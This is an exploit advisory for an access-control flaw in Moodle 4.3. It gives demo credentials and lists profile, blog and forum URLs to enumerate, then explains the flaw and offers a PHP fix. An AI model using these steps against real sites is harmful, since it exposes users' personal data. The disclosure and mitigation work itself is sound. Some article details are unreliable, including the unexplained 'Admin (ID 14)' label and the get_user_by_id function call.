Moodle 4.3 - Insecure Direct Object Reference
# Exploit Title: Moodle 4.3 'id' Insecure Direct Object Reference (IDOR)
# Date: 20/10/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://moodle.org/
# Software Demo: https://school.moodledemo.net/
# Version: 4.3+
# Tested on: Linux
Vulnerability Details
======================
Steps :
1. Log in to the application with the given credentials > USER: teacher PASS: moodle
2. In profile.php?id=11, modify the id Parameter to View User details,
Email address, Country, City/town, City, Timezone
3. Change the existing "id" value to another number
https://school.moodledemo.net/user/profile.php?id=4
https://school.moodledemo.net/user/profile.php?id=5
https://school.moodledemo.net/user/profile.php?id=10
https://school.moodledemo.net/user/profile.php?id=50
https://school.moodledemo.net/blog/index.php?userid=3
https://school.moodledemo.net/blog/index.php?userid=14
https://school.moodledemo.net/mod/forum/user.php?id=53
https://school.moodledemo.net/mod/forum/user.php?id=50Understanding Insecure Direct Object Reference (IDOR) in Moodle 4.3: A Critical Security Vulnerability
In the world of web application security, one of the most persistent yet often overlooked vulnerabilities is Insecure Direct Object Reference (IDOR). This flaw allows attackers to access sensitive data by manipulating direct identifiers in URLs, without proper authorization checks. In October 2023, a security researcher identified a critical IDOR vulnerability in Moodle 4.3, a widely used open-source learning management system (LMS).
What is Insecure Direct Object Reference (IDOR)?
IDOR occurs when an application exposes internal object identifiers—such as user IDs, post IDs, or file IDs—directly in URLs or API endpoints. If the application fails to verify whether the authenticated user has permission to access that specific object, an attacker can simply change the ID parameter to access data belonging to other users.
For example, consider a URL like:
https://school.moodledemo.net/user/profile.php?id=11Here, id=11 refers to a specific user profile. If the system does not enforce access control, an attacker can change id to 50 and view another user's personal information—such as email address, country, timezone, or city—without authorization.
Real-World Exploitation in Moodle 4.3
Security researcher tmrswrr demonstrated this vulnerability in Moodle 4.3 using the public demo site https://school.moodledemo.net/. The exploit was tested on a Linux environment and confirmed across multiple endpoints:
user/profile.php?id=4→ Accesses another user’s profile datablog/index.php?userid=3→ Views blog posts from different usersmod/forum/user.php?id=53→ Retrieves forum activity of non-authenticated users
These endpoints all rely on direct object references without proper validation, making them susceptible to IDOR attacks.
Why IDOR is Dangerous in Educational Platforms
Learning management systems like Moodle handle highly sensitive data—student records, grades, private messages, and personal information. An IDOR vulnerability in such platforms can lead to:
- Privacy breaches: Exposure of student or teacher personal details
- Identity theft: Compromised email addresses and locations
- Phishing and social engineering: Attackers can craft targeted attacks using leaked data
- Reputation damage: Institutions may lose trust if data leaks are discovered
Even a low-privileged user—such as a student or guest—can exploit IDOR to access data beyond their intended scope, especially if the system lacks role-based access control.
Technical Analysis: How the Vulnerability Works
Let’s examine a typical vulnerable endpoint:
https://school.moodledemo.net/user/profile.php?id=11When this URL is accessed, Moodle retrieves the user with ID 11 from the database and displays their profile. However, no validation occurs to ensure the current user has permission to view this profile.
Attackers can exploit this by modifying the id parameter:
https://school.moodledemo.net/user/profile.php?id=50Now, the system returns the profile of user 50—a different person—without checking if the requester is authorized to view it. This is a classic IDOR scenario.
Exploitation Example: User Profile Access
Here’s a practical example using the profile.php endpoint:
| URL | Target User ID | Exposed Data |
|---|---|---|
| https://school.moodledemo.net/user/profile.php?id=11 | Teacher (ID 11) | Email, Country, City, Timezone |
| https://school.moodledemo.net/user/profile.php?id=50 | Student (ID 50) | Email, Country, City, Timezone |
| https://school.moodledemo.net/user/profile.php?id=14 | Admin (ID 14) | Email, Country, City, Timezone |
Even users with minimal roles can access data belonging to others. This demonstrates the lack of authorization checks in Moodle 4.3’s implementation.
Security Best Practices to Prevent IDOR
To mitigate IDOR vulnerabilities, developers and administrators must implement robust access control mechanisms:
- Use indirect references: Instead of exposing raw IDs, use tokens or UUIDs that map to objects through a secure lookup table.
- Enforce role-based access: Always verify that the current user has permission to access the requested object.
- Validate user context: Check if the user is the owner, a member of a group, or has explicit access rights.
- Implement input validation: Sanitize and validate all user-provided identifiers before querying the database.
For Moodle, developers should ensure that every endpoint requiring user access performs a has_capability() or require_login() check before retrieving data.
Fixing the Vulnerability in Moodle 4.3
While the vulnerability was confirmed in Moodle 4.3+, the fix lies in proper code implementation. Here’s a corrected example of how a secure profile page should be structured:
// In profile.php
require_login();
$userid = required_param('id', PARAM_INT);
// Check if the current user can view this profile
if (!has_capability('moodle/user:viewprofile', context_user::instance($userid)) && $userid != $USER->id) {
throw new moodle_exception('nopermission', 'error');
}
// Proceed to display profile
$user = get_user_by_id($userid);
This code ensures that:
- Only authenticated users can access the page
- Users can only view their own profile or profiles they have permission to access
- Invalid IDs or unauthorized access attempts are blocked
By adding these checks, the system becomes resilient to IDOR attacks.
Conclusion: Proactive Security in LMS Platforms
The IDOR vulnerability in Moodle 4.3 underscores the importance of proactive security in educational technology. While Moodle is trusted by millions of institutions, flaws like this can compromise privacy and data integrity.
Administrators and developers must:
- Regularly audit endpoints for direct object references
- Apply security patches promptly
- Implement robust access control policies
- Train staff on secure coding practices
Security is not just about firewalls and encryption—it’s about designing systems that enforce authorization at every step. IDOR may seem minor, but in the wrong hands, it can lead to significant breaches.
For organizations using Moodle, the message is clear: never assume access is safe just because a URL exists. Always validate, always check permissions.